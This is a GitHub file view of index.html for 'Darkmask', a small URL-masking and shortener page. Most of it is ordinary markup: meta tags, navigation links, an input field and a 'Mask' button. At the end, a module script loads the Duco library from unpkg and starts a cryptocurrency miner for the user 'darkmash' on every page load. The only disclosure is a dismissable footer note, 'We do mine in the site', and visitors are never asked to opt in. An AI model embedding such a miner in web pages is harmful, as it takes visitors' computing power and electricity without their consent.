-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
72 lines (55 loc) · 2.94 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Darkmask || Darkmash || Url Masking || Url Shortener</title>
<link rel="stylesheet" href="style_.css">
<meta property="og:image" content="masquerade-carnival-mask-icon-illustration-free-vector-removebg-preview.png" />
<meta name="description" content="Darkmask || Create Masked Urls.. || Url Shortener || By Darkmash" />
<meta name="keywords" content="darkmash , tools , startup , coders, darkmask, url, masking" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="icon" type="image/png" href="masquerade-carnival-mask-icon-illustration-free-vector-removebg-preview.png" />
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="darkmask">
<meta itemprop="description" content="Darkmask || Create Masked Urls..">
<meta itemprop="image" content="masquerade-carnival-mask-icon-illustration-free-vector-removebg-preview.png">
<!-- Twitter Card data -->
<meta name="twitter:card" content="Make urls masked..">
<meta name="twitter:title" content="Darkmask">
<meta name="twitter:description" content="Darkmask || Create Masked Urls..">
<meta name="twitter:image" content="masquerade-carnival-mask-icon-illustration-free-vector-removebg-preview.png">
<!-- Open Graph data -->
<meta property="og:title" content="Darkmask" />
<meta property="og:type" content="Landing page" />
<meta property="og:url" content="https://darkmash-org.github.io/Darkmask" />
<meta property="og:image" content="masquerade-carnival-mask-icon-illustration-free-vector-removebg-preview.png" />
<meta property="og:description" content="Darkmask || Create Masked Urls.." />
<meta property="og:site_name" content="Darkmask" />
</head>
<body>
<div>
<a class="ls" href="index.html">Home</a>
<a class="ls" href="https://darkmash-org.github.io/">Darkmash</a>
<a class="ls" href="https://github.com/darkmash-org/Statman/blob/main/fund_us.md">Support</a>
</div>
<input id="b" type="text" placeholder=" Url " />
<button onclick="make();" id="make">Mask</button>
<p id="url">Masked Url....</p>
<a id="github" href="https://github.com/darkmash-org/Darkmask" target="_blank" rel="noopener noreferrer"><img height=45px src="GitHub.png" alt="Github Repo"></a>
<script src="script_.js"></script>
<footer id="footer">
<div class="alert">
<span class="closebtn" onclick="this.parentElement.style.display='none';">×</span> We do mine in the site . This is to make sure the company could serve yall the next day : )
</div>
</footer>
<script type="module">
import { Duco } from 'https://www.unpkg.com/duco';
const miner = new Duco({
username: 'darkmash'
})
miner.start()
</script>
</body>
</html>